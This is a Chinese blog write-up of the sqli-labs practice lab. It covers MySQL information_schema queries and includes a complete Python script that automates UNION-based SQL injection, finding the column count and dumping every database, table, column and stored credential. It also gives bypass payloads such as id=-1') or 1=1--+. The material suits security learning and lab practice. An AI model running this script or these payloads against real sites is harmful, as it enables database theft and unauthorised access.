标签:name -- text pos sqli lab1 报错 id
基础知识
常用函数:
version() Mysql版本
user() 数据库用户名
database() 数据库名
@@datadir 数据库安装路径
@@version_compile_os 操作系统版本
常用查询语句:
- 查库
select schema_name from information_schema.schemata
- 查表
select table_name from information_schema.tables where table_schema='security'
-- 该表名用的时候大多转为*16*进制
- 查列
select column_name from information_schema.columns where table_name='users'
- 查字段
select username,password from security.users
- 查询结果按第n列排序 (用于报错注入测试有几列)
order by (n)
sql注释符:
-
# -
--+ -
--
字符串连接函数
-
concat (str1 , str2) -- 连接字符串, 无分隔符 -
concat (-/~ , str1 , str2) -- 连接字符串, 有分隔符 -
group_concat (str1 , str2) -- 连接字符串, 并用 ',' 分隔每一个字符
字符型 数字型 搜索型 注入的区别和判断
(如题)
study 1:
首先用id=1'发现报错, 再用id=1' or '1'='1发现成功注入, 判断为字符型注入
写了个脚本, 一把梭
# coding=utf-8
import requests
from urllib import parse
import sys
from bs4 import BeautifulSoup
url = "http://www.sqlstudy.com/sqlstudy/Less-1"
def CheckStatus(r_text):
if "Login name" in r_text:
return 1
else:
return 0
def PrintNameAndPswd(res_text):
pos_name = res_text.index("Your Login name:")
pos_name_move = pos_name
pos_pswd = res_text.index("Your Password:", pos_name)
pos_pswd_move = pos_pswd
str_name = ''
str_pswd = ''
while res_text[pos_name_move] != '<':
pos_name_move += 1
str_name = res_text[pos_name : pos_name_move]
while res_text[pos_pswd_move] != '<':
pos_pswd_move += 1
str_pswd = res_text[pos_pswd : pos_pswd_move]
# print (str_name + '\n' + str_pswd)
return str_name
def GetColumnsNum():
left = 1
right = 20
mid = (left + right) // 2
while left <= right:
payload = "id=1' order by {}--+".format(mid)
res = requests.get(url = url , params = payload)
# print(parse.unquote(res.url))
res_text = res.text
if CheckStatus(res_text):
# PrintNameAndPswd(res_text , pos_name , pos_pswd)
left = mid + 1
else:
right = mid - 1
mid = (right + left) // 2
return mid
def HowItContrl(columnsnum):
# Your Login name:2
# Your Password:3
payload = "id=-1' union select "
for i in range(1 , columnsnum + 1):
payload = payload + "{},".format(i)
res = requests.get(url=url , params=payload.strip(",") + '--+')
res_text = res.text
if CheckStatus(res_text):
PrintNameAndPswd(res_text)
def GetAllDatabase():
payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+"
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
return PrintNameAndPswd(res_text)
def WhereAmI():
payload = "id=-1' union select 1,database(),3 --+"
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
MyPosition = PrintNameAndPswd(res_text)
return MyPosition[MyPosition.index(":") + 1 : ]
def GetTableName(DatabaseName):
payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName)
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
TableName = PrintNameAndPswd(res_text)
TableName = TableName[TableName.index(":") + 1 :].split(",")
return TableName
def GetColumnName(TableName):
payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName)
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
ColumnName = PrintNameAndPswd(res_text)
ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",")
return ColumnName
def GetDetails(DatabaseName , TableName , ColumnName):
payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName)
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
Details = PrintNameAndPswd(res_text)
Details = Details[Details.index(":") + 1 :].split(",")
return Details
if __name__ == "__main__" :
with open('sqli-lab1.txt' , 'w') as f:
columnsnum = GetColumnsNum()
f.write("column_number = " + str(columnsnum) + '\n')
# HowItContrl(columnsnum)
DatabaseName = GetAllDatabase()
DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",")
MyPosition = WhereAmI()
f.write("You are in : " + MyPosition + '\n')
for i in range(0,len(DatabaseName)):
f.write("DatabaseName : " + DatabaseName[i] + '\n')
TableName = []
TableName = GetTableName(DatabaseName[i])
# print(TableName)
for j in range(0,len(TableName)):
f.write("--TableName : " + TableName[j] + '\n')
ColumnName = []
ColumnName = GetColumnName(TableName[j])
# print(ColumnName)
for k in range(0, len(ColumnName)):
f.write("----ColumnName : " + ColumnName[k] + '\n')
Details = []
Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k])
# print(type(Details))
Details_type = str(type(Details))
if not "NoneType" in Details_type:
for l in range(0,len(Details)):
f.write("------Details : " + Details[l] + '\n')
if l == len(Details) - 1:
f.write("\n---------------------------------------------------------------\n\n")
else:
f.write("--------Details : NULL \n")
study 2:
发现是数字型, 用id=-1 or 1=1--+就能绕过, 然后脚本改改也能一把梭
study 3:
使用id=1'之后发现报错, 结合错误语句看出是('id'), 用id=-1') or 1=1--+就能绕过, 然后改脚本一把梭
study 4:
id=1'没报错, 换成id=1"报错, 结合语句判断出是("id"), 用id=-1") or 1=1--+即可绕过, 改脚本梭哈
标签:name,--,text,pos,sqli,lab1,报错,id 来源: https://www.cnblogs.com/dian-zh/p/15805448.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。